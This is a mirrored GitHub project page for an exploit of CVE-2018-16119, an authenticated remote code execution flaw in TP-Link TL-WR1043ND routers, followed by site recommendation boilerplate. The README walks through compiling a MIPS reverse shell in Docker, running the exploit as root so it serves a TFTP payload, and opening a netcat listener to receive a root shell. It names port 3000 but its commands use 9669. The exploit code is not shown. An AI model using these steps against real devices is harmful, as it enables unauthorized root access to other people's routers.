Git Product home page Git Product logo

cve-2018-16119's Introduction

CVE-2018-16119 Authenticated Remote Code Execution TP-Link WR1043ND

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16119

Exploit to get Remote Root Shell in TP-Link TP-Link TL-WR1043ND Devices

  1. Do not forget to modify and compile reverse_shell_mipsbe.c with the name of shh . cp reverse_shell_mipsbe.c /tmp/ . docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash Inside Docker: . cd /tmp ; mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh Outside Docker: . cp /tmp/shh .

  2. The exploit need Authentication. I know, it is not so good

  3. Run the exploit as root. This is needed by the exploit to start a tftp server in port 69

  4. Start a listener in port 3000 in order to receive the Shell: Linux: nc -l -p 9669 -vv OS X: nc -l 9669 -vv

  5. Do not wait a verbose message on NetCat, just start sending commands!

Thanks for your time!

You can contact me in Twitter as @SecSignal and in Linkeding as Alejandro Parodi

cve-2018-16119's People

Contributors

hdbreaker avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.